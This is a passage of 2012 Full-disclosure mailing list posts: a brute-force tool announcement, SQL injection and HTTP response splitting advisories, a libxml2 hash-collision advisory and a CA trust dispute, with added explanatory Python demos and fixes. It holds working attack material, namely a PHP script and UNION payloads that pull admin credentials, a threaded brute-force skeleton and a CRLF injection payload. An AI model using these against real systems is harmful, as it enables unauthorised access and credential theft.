> obvious as threads are GIL locked, while multi-processing can be spread
> amongst cores with the kernel's scheduler).

That's not always true. If the process is network bound (which seems
to be the case with a bruteforce tool), then having multiprocessing
will not necessarily increase speed. If the software was well written,
it can be very fast and use python threads.

> On Wed, Feb 22, 2012 at 6:51 PM, Nate Theis  wrote:
>>
>> You might look into PyPy for a speed boost: http://pypy.org
>>
>> On Feb 22, 2012 6:43 AM, "lanjelot"  wrote:
>>>
>>> Hello FD,
>>>
>>> Released two months ago, and downloaded a few thousand times since, I
>>> wanted to share with you a new multi-purpose brute-forcing tool named
>>> Patator (http://code.google.com/p/patator/).
>>>
>>> I am posting here because I would like to get more feedback from
>>> people using it, so feel free to fire me an email if you have any
>>> queries, or rather use the issues tracker on patator project page.
>>>
>>> To put it bluntly, I just got tired of using Medusa, Hydra, ncrack,
>>> metasploit auxiliary modules, nmap NSE scripts and the like because:
>>>  - they either do not work or are not reliable (got me false
>>> negatives several times in the past)
>>>  - they are slow (not multi-threaded or not testing multiple
>>> passwords within the same TCP connection)
>>>  - they lack very useful features that are easy to code in python
>>> (eg. interactive runtime)
>>>
>>> Basically you should give Patator a try once you get disappointed by
>>> Medusa, Hydra or other brute-forcing tools and are about to code your
>>> own small script because Patator will allow you to:
>>>  - Not write the same code over and over, due to its modular design
>>> and flexible usage
>>>  - Run multi-threaded
>>>  - Benefit from useful features such as the interactive runtime
>>> commands, automatic response logging, etc.
>>>
>>> Currently Patator supports the following modules :
>>>  - ftp_login     : Brute-force FTP
>>>  - ssh_login     : Brute-force SSH
>>>  - telnet_login  : Brute-force Telnet
>>>  - smtp_login    : Brute-force SMTP
>>>  - smtp_vrfy     : Enumerate valid users using the SMTP 'VRFY' command
>>>  - smtp_rcpt     : Enumerate valid users using the SMTP 'RCPT TO' command
>>>  - http_fuzz     : Brute-force HTTP/HTTPS
>>>  - pop_passd     : Brute-force poppassd (not POP3)
>>>  - ldap_login    : Brute-force LDAP
>>>  - smb_login     : Brute-force SMB
>>>  - mssql_login   : Brute-force MSSQL
>>>  - oracle_login  : Brute-force Oracle
>>>  - mysql_login   : Brute-force MySQL
>>>  - pgsql_login   : Brute-force PostgreSQL
>>>  - vnc_login     : Brute-force VNC
>>>
>>>  - dns_forward   : Forward lookup subdomains
>>>  - dns_reverse   : Reverse lookup subnets
>>>  - snmp_login    : Brute-force SNMPv1/2 and SNMPv3
>>>
>>>  - unzip_pass    : Brute-force the password of encrypted ZIP files
>>>  - keystore_pass : Brute-force the password of Java keystore files
>>>
>>> The name "Patator" comes from the famous weapon :
>>> http://www.youtube.com/watch?v=xoBkBvnTTjo
>>>
>>> Cheers!
>>>



-- 
Andrés Riancho
Director of Web Security at Rapid7 LLC
Founder at Bonsai Information Security
Project Leader at w3af

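The two design points argued over in this thread, reusing one connection for many login attempts and using Python threads for a network-bound job, are easy to see in a small skeleton. The following is an added example, not Patator's code: FakeService is a constructed stand-in for a remote login service (one instance models one TCP connection, with a slow connect() and a cheap per-attempt round trip), and the names brute_force, fail_on_attempt and the candidate lists are assumptions made for the demonstration. Because the workers spend their time sleeping on the simulated network, the GIL is released and threads overlap the way they would against a real service. The ConnectionError path also covers the false-negative complaint above: a candidate whose attempt was lost to a dropped connection is requeued rather than silently treated as wrong.

```python
"""Threaded brute-force skeleton: one persistent connection per worker,
candidates pulled from a shared queue, early stop on the first hit, and
requeue of any candidate lost to a connection error.
Added example, not Patator's code; FakeService is constructed here so the
block runs offline."""
import itertools
import queue
import threading
import time


class FakeService:
    """Stand-in for a remote login service (constructed for this example).
    connect() is deliberately slow to mimic TCP/handshake cost; login() is a
    cheap round trip on an already-open connection.  fail_on_attempt makes
    exactly one attempt die with ConnectionError, like a reset by peer."""

    def __init__(self, secret, connect_delay=0.01, attempt_delay=0.0005,
                 fail_on_attempt=None):
        self._secret = secret
        self._connect_delay = connect_delay
        self._attempt_delay = attempt_delay
        self._fail_on_attempt = fail_on_attempt
        self._lock = threading.Lock()
        self.connects = 0
        self.attempts = 0

    def connect(self):
        time.sleep(self._connect_delay)
        with self._lock:
            self.connects += 1

    def login(self, user, password):
        time.sleep(self._attempt_delay)  # simulated network round trip
        with self._lock:
            self.attempts += 1
            n = self.attempts
        if n == self._fail_on_attempt:
            raise ConnectionError("connection reset by peer")
        return (user, password) == self._secret


def brute_force(service, users, passwords, threads=8):
    """Try every (user, password) pair; return the first valid one or None.
    Each worker connects once and reuses that connection for all of its
    candidates (many passwords per TCP connection)."""
    work = queue.Queue()
    for pair in itertools.product(users, passwords):
        work.put(pair)
    hits = []
    stop = threading.Event()

    def worker():
        service.connect()
        while not stop.is_set():
            try:
                user, pw = work.get_nowait()
            except queue.Empty:
                return
            try:
                ok = service.login(user, pw)
            except ConnectionError:
                # Never drop a candidate on a transport error: that is how a
                # tool produces false negatives.  Requeue it and reconnect.
                work.put((user, pw))
                service.connect()
                continue
            if ok:
                hits.append((user, pw))
                stop.set()  # tell the other workers to stop
                return

    workers = [threading.Thread(target=worker) for _ in range(threads)]
    for t in workers:
        t.start()
    for t in workers:
        t.join()
    return hits[0] if hits else None


if __name__ == "__main__":
    svc = FakeService(("root", "s3cret"), fail_on_attempt=7)
    users = ["admin", "root"]
    passwords = ["password", "123456", "letmein", "qwerty", "admin", "s3cret"]
    print(brute_force(svc, users, passwords, threads=4),
          "connects:", svc.connects, "attempts:", svc.attempts)
```

With four workers the service sees exactly four connects plus one reconnect after the injected reset, not one connect per attempt, and the lost candidate is still tried.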


[Full-disclosure] YVS Image Gallery Sql Injection

2012-02-23 Thread CorryL
-=[ADVISORY---]=-

YVS Image Gallery

Author: Corrado Liotta Aka CorryL [corry...@gmail.com]
-=[---]=-


-=[+] Application: YVS Image Gallery
-=[+] Version: 0.0.0.1
-=[+] Vendor's URL: http://yvs.vacau.com/gallery.html
-=[+] Platform: Windows\Linux\Unix
-=[+] Bug type: SQL Injection
-=[+] Exploitation: Remote
-=[-]
-=[+] Author: Corrado Liotta Aka CorryL ~ corryl80[at]gmail[dot]com ~
-=[+] Facebook: https://www.facebook.com/CorryL
-=[+] Twitter: https://twitter.com/#!/CorradoLiotta
-=[+] Linkedin: http://it.linkedin.com/pub/corrado-liotta/21/1a8/611
-=[+] +Google: https://plus.google.com/u/0/109396477464303670923

...::[ Description ]::..

This is a small database driven gallery created to be implemented within
your existing site. The coding is reasonably straightforward and can be
easily moved into your existing development by anyone with a basic
understanding of PHP. Only a first attempt at the system, it has a long way
to go, but it provides you with all the necessary tools to run your own
picture gallery, such as uploading of multiple images and creation of
thumbnails. The gallery is distributed as free-ware but if you decide to use
it in any business or just decide that it's worth it, any donations will be
greatly appreciated. Details will be made available soon.


...::[ Bug ]::..

By exploiting this bug a remote attacker is able to retrieve the user name
and password of the admin.



...::[ Proof Of Concept ]::..

http://Server-Victim/image_gallery/view_album.php?album_id=-1%20UNION%20%20SELECT%20username%20FROM%20user

...::[ Exploit ]::..

#!/usr/bin/php -f
<?php
// The opening of this script was lost in the archive; the argument handling
// below is reconstructed: $target is the host, $info the column to pull
// (username or password) via the UNION in the album_id parameter.
if ($argc < 3) {
    fwrite(STDERR, "Usage: {$argv[0]} <target-host> <username|password>\n");
    exit(1);
}
$target = $argv[1];
$info   = $argv[2];

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "http://$target/image_gallery/view_album.php?album_id=-1%20UNION%20%20SELECT%20$info%20FROM%20user");
curl_setopt($ch, CURLOPT_HTTPGET, 1);
curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)");
curl_setopt($ch, CURLOPT_TIMEOUT, 3);
curl_setopt($ch, CURLOPT_LOW_SPEED_LIMIT, 3);
curl_setopt($ch, CURLOPT_LOW_SPEED_TIME, 3);
curl_setopt($ch, CURLOPT_COOKIEJAR, "/tmp/cookie_$target");
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); // return the body instead of printing it inside curl_exec
$buf = curl_exec($ch);
curl_close($ch);
unset($ch);

echo $buf;
?>

..::[ Disclosure Timeline ]::..

[23/02/2012] - No Vendor Information



-- 
Corrado Liotta         A.k.a (CorryL)
Email: corry...@gmail.com
Skype: corrado_liotta
Facebook: http://www.facebook.com/home.php/CorryL
Twitter: https://twitter.com/#!/CorradoLiotta
Linkedin: http://it.linkedin.com/pub/corrado-liotta/21/1a8/611

Specialist in:
Bug Hunting
Security Audits
Penetration Test

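The injection in the PoC works because the album_id value is pasted straight into the statement and the injected SELECT returns the same number of columns as the original query, so the UNION is accepted and the user table's column is rendered where an album title would be. The block below is an added example, not YVS code: the album and user tables, their rows, and the functions view_album_vulnerable and view_album_fixed are constructed here against an in-memory SQLite database to reproduce the advisory's payload next to the parameterised query that closes it.

```python
"""UNION-based SQL injection of the kind in the advisory, reproduced on an
in-memory SQLite schema next to the parameterised query that stops it.
Added example; schema, rows and function names are constructed here and
are not the gallery's code."""
import sqlite3


def make_db():
    """Constructed stand-in for the gallery's database."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE album (album_id INTEGER, title TEXT);
        CREATE TABLE user  (username TEXT, password TEXT);
        INSERT INTO album VALUES (1, 'holiday'), (2, 'family');
        INSERT INTO user  VALUES ('admin', 'hunter2');
    """)
    return db


def view_album_vulnerable(db, album_id):
    """The request parameter is concatenated into the statement, which is
    what lets ?album_id=-1 UNION SELECT username FROM user through.
    The album row set is empty for id -1, so only the UNION rows remain."""
    sql = "SELECT title FROM album WHERE album_id=" + album_id
    return [row[0] for row in db.execute(sql)]


def view_album_fixed(db, album_id):
    """Validate the type first, then bind the value: a bound parameter can
    never change the shape of the statement, so no UNION can be appended."""
    try:
        album_id = int(album_id)
    except ValueError:
        raise ValueError("album_id must be an integer")
    sql = "SELECT title FROM album WHERE album_id=?"
    return [row[0] for row in db.execute(sql, (album_id,))]


# The advisory's payload, URL-decoded, for username and for password.
PAYLOAD_USERNAME = "-1 UNION SELECT username FROM user"
PAYLOAD_PASSWORD = "-1 UNION SELECT password FROM user"


if __name__ == "__main__":
    db = make_db()
    print("normal   :", view_album_vulnerable(db, "1"))
    print("username :", view_album_vulnerable(db, PAYLOAD_USERNAME))
    print("password :", view_album_vulnerable(db, PAYLOAD_PASSWORD))
    print("fixed    :", view_album_fixed(db, "1"))
```

The int() check alone would already reject this payload; the bound parameter is what keeps the query safe even for string-typed parameters, where no such cast is available.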


[Full-disclosure] [SECURITY] [DSA 2417-1] libxml2 security update

2012-02-23 Thread Nico Golde
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

- -
Debian Security Advisory DSA-2417-1   secur...@debian.org
http://www.debian.org/security/Nico Golde
February 22, 2012  http://www.debian.org/security/faq
- -

Package: libxml2
Vulnerability  : computational denial of service
Problem type   : local/remote
Debian-specific: no
Debian Bug : 660846
CVE ID : CVE-2012-0841

It was discovered that the internal hashing routine of libxml2,
a library providing an extensive API to handle XML data, is vulnerable to
predictable hash collisions.  Given an attacker with knowledge of the
hashing algorithm, it is possible to craft input that creates a large
amount of collisions.  As a result it is possible to perform denial of
service attacks against applications using libxml2 functionality because
of the computational overhead.


For the stable distribution (squeeze), this problem has been fixed in
version 2.7.8.dfsg-2+squeeze3.

For the testing (wheezy) and unstable (sid) distributions, this problem
will be fixed soon.

We recommend that you upgrade your libxml2 packages.

Further information about Debian Security Advisories, how to apply
these updates to your system and frequently asked questions can be
found at: http://www.debian.org/security/

Mailing list: debian-security-annou...@lists.debian.org
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.11 (GNU/Linux)

iEYEARECAAYFAk9FdM8ACgkQHYflSXNkfP+BkwCcDh11fC0BO+8QLOjCnwYlJ9xt
jQwAnjBxzz8GLFVXLMuTTlrV4lnVvD6h
=0qEK
-END PGP SIGNATURE-

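The advisory's mechanism, a predictable string hash letting an attacker craft many keys that land in one bucket so that inserts degrade to a linear chain walk, is shown below on a toy table. This is an added example and not libxml2's code: the hash h = h*31 + c is an assumption chosen because its collisions are easy to construct by hand ("Aa" and "BB" both hash to 2112, so any concatenation of those two blocks collides), the ChainedTable class counts comparisons instead of timing so the effect is deterministic, and the keyed alternative uses BLAKE2b with a per-process key as one way of making the bucket unpredictable. It also shows a caveat worth knowing before reaching for a fix: merely starting the same multiplicative hash from a secret seed does not break these collisions, because for keys of equal length the seed adds the same term to every hash.

```python
"""Predictable-hash collision DoS against a chained hash table, and why a
keyed hash (not just a seeded start value) is needed to stop it.
Added example; the toy hash is an assumption for illustration, not
libxml2's dictionary hash."""
import hashlib


def toy_hash(s):
    """Unkeyed multiplicative string hash (assumed, for illustration)."""
    h = 0
    for ch in s.encode():
        h = (h * 31 + ch) & 0xFFFFFFFF
    return h


def seeded_toy_hash(s, seed):
    """Same hash started from a secret seed.  For keys of equal length the
    seed contributes the identical term seed*31**len to every key, so the
    crafted collisions survive: seeding the start value is not a fix."""
    h = seed & 0xFFFFFFFF
    for ch in s.encode():
        h = (h * 31 + ch) & 0xFFFFFFFF
    return h


def keyed_hash(s, key):
    """Keyed hash: without the key an attacker cannot predict the bucket."""
    digest = hashlib.blake2b(s.encode(), key=key, digest_size=4).digest()
    return int.from_bytes(digest, "big")


def colliding_keys(n_blocks):
    """'Aa' and 'BB' collide under h*31+c (65*31+97 == 66*31+66 == 2112),
    so every concatenation of n_blocks of them collides: 2**n_blocks keys."""
    keys = [""]
    for _ in range(n_blocks):
        keys = [k + blk for k in keys for blk in ("Aa", "BB")]
    return keys


class ChainedTable:
    """Minimal separate-chaining table that counts key comparisons, the
    work an attacker inflates when every key lands in one chain."""

    def __init__(self, nbuckets, hashfn):
        self.buckets = [[] for _ in range(nbuckets)]
        self.hashfn = hashfn
        self.comparisons = 0

    def insert(self, key):
        chain = self.buckets[self.hashfn(key) % len(self.buckets)]
        for k in chain:  # walk the chain looking for a duplicate
            self.comparisons += 1
            if k == key:
                return
        chain.append(key)

    def occupied(self):
        return sum(1 for b in self.buckets if b)


def insertion_cost(keys, hashfn, nbuckets=4096):
    """Return (comparisons performed, buckets used) for inserting keys."""
    table = ChainedTable(nbuckets, hashfn)
    for k in keys:
        table.insert(k)
    return table.comparisons, table.occupied()


if __name__ == "__main__":
    keys = colliding_keys(10)  # 1024 distinct keys, one toy_hash value
    print("unkeyed :", insertion_cost(keys, toy_hash))
    print("seeded  :", insertion_cost(keys, lambda s: seeded_toy_hash(s, 0xC0FFEE)))
    print("keyed   :", insertion_cost(keys, lambda s: keyed_hash(s, b"per-process secret")))
```

For 1024 colliding keys the unkeyed and seeded tables do 1024*1023/2 comparisons in a single bucket, quadratic in the input, while the keyed table spreads the same keys over hundreds of buckets and does on the order of a hundred.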


[Full-disclosure] Mobile Mp3 Search Engine HTTP Response Splitting

2012-02-23 Thread CorryL
-=[ADVISORY---]=-

  Mobile Mp3 Search Engine 2.0
Author: Corrado Liotta Aka CorryL [corry...@gmail.com]

-=[---]=-


-=[+] Application: Mobile Mp3 Search Engine
-=[+] Version: 2.0
-=[+] Vendor's URL: http://www.php-search-engine.com/_mobile
-=[+] Platform: Windows\Linux\Unix
-=[+] Bug type: HTTP Response Splitting
-=[+] Exploitation: Remote
-=[-]
-=[+] Author: Corrado Liotta Aka CorryL ~ corryl80[at]gmail[dot]com ~
-=[+] Facebook: https://www.facebook.com/CorryL
-=[+] Twitter: https://twitter.com/#!/CorradoLiotta
-=[+] Linkedin: http://it.linkedin.com/pub/corrado-liotta/21/1a8/611

...::[ Description ]::..

This mobile mp3 search engine is the first mp3 search engine with
mobile high-end support.
It is an automatic mobile mp3 search engine that uses the 4shared API
plus a Google-powered search engine.
The script comes with an autocharts system, latest searches, and direct
download links from 4shared.


...::[ Bug ]::..

HTTP Response Splitting

HTTP response splitting is a form of web application vulnerability,
resulting from the failure of the application or its environment to
properly sanitize input values. It can be used to perform cross-site
scripting attacks, cross-user defacement, web cache poisoning, and
similar exploits.


...::[ Proof Of Concept ]::..

http://remote-server/dl.php?url=http://www.google.it

..::[ Disclosure Timeline ]::..

[22/02/2012] - Vendor notification


-- 
Corrado Liotta         A.k.a (CorryL)
Email: corry...@gmail.com
Skype: corrado_liotta
Facebook: http://www.facebook.com/home.php/CorryL
Twitter: https://twitter.com/#!/CorradoLiotta
Linkedin: http://it.linkedin.com/pub/corrado-liotta/21/1a8/611

Specialist in:
Bug Hunting
Security Audits
Penetration Test

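What "failure to sanitize input values" means for response splitting is concrete: a parameter that ends up in a response header carries a CR/LF pair (sent as %0d%0a in the query string and decoded by the server), which terminates the header block and lets the attacker write a complete second response that a proxy or cache will take as the server's. The block below is an added example, not the product's dl.php: redirect_vulnerable and redirect_hardened are constructed builders of a redirect response, split_responses is a deliberately naive downstream parser of the kind a cache might use, and PAYLOAD is a constructed value for the url parameter.

```python
"""CRLF injection into a redirect header (the mechanism of HTTP response
splitting) shown on raw response bytes, next to a hardened builder.
Added example; the handler, parser and payload are constructed here and
are not the product's dl.php."""
from urllib.parse import urlsplit


def redirect_vulnerable(url):
    """Copies the user-supplied url into Location without any filtering."""
    return ("HTTP/1.1 302 Found\r\n"
            "Content-Length: 0\r\n"
            "Location: " + url + "\r\n\r\n").encode("latin-1")


def redirect_hardened(url):
    """Rejects control characters, so nothing can end the header line, and
    requires an absolute http(s) URL so the redirect target is what the
    application expects."""
    if any(ch in url for ch in "\r\n\0"):
        raise ValueError("control character in url")
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https") or not parts.netloc:
        raise ValueError("not an absolute http(s) url")
    return ("HTTP/1.1 302 Found\r\n"
            "Content-Length: 0\r\n"
            "Location: " + url + "\r\n\r\n").encode("latin-1")


def split_responses(raw):
    """Cut a byte stream into (status line, headers, body) tuples the way a
    naive downstream parser (proxy, cache) would: header block up to the
    blank line, then Content-Length bytes of body, repeat."""
    out = []
    raw = raw.lstrip(b"\r\n")
    while raw:
        head, _, raw = raw.partition(b"\r\n\r\n")
        lines = head.split(b"\r\n")
        headers = {}
        for line in lines[1:]:
            name, _, value = line.partition(b":")
            headers[name.strip().lower()] = value.strip()
        length = int(headers.get(b"content-length", b"0"))
        body, raw = raw[:length], raw[length:]
        out.append((lines[0], headers, body))
        raw = raw.lstrip(b"\r\n")
    return out


# Constructed attacker value for the url parameter (already URL-decoded):
# it closes the server's headers, then supplies a whole second response.
PAYLOAD = ("http://example.test/\r\n"
           "Content-Length: 0\r\n"
           "\r\n"
           "HTTP/1.1 200 OK\r\n"
           "Content-Type: text/html\r\n"
           "Content-Length: 20\r\n"
           "\r\n"
           "<script>x()</script>")


if __name__ == "__main__":
    for status, headers, body in split_responses(redirect_vulnerable(PAYLOAD)):
        print(status, dict(headers), body)
    print(split_responses(redirect_hardened("http://www.google.it")))
```

The vulnerable builder yields two parsed responses, the second one entirely attacker-controlled; the hardened builder refuses the payload before any header is written.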


Re: [Full-disclosure] Trustwave and Mozilla (Resolved)

2012-02-23 Thread Al Billings
Hello,

They weren't rewarded. They were not punished for voluntarily coming
forward and reporting the problem to Mozilla. Punishing them for doing
so would only convince others not to come forward in the future. This
has triggered a policy change and announcements to CAs; if you've
followed Mozilla's security policy discussions, these *will* result
in people being removed for such behavior in the future.

Hyperbole serves no real purpose here.

 Al

On 02/22/2012 04:12 PM, Jeffrey Walton wrote:
> It appears to be official.
>
> Trustwave issued MitM certificates, which is deceptive, unethical, and
> contrary to its agreement for inclusion.
>
> Mozilla just rewarded their violations of trust by continuing their
> inclusion. Apparently, agreements between Mozilla and CAs have no
> veracity as both are more than happy to violate the end user.
>
> Original Bug: https://bugzilla.mozilla.org/show_bug.cgi?id=724929
> NSS and Firefox Update: https://bugzilla.mozilla.org/show_bug.cgi?id=728617
>


-- 
Al Billings
Mozilla Security
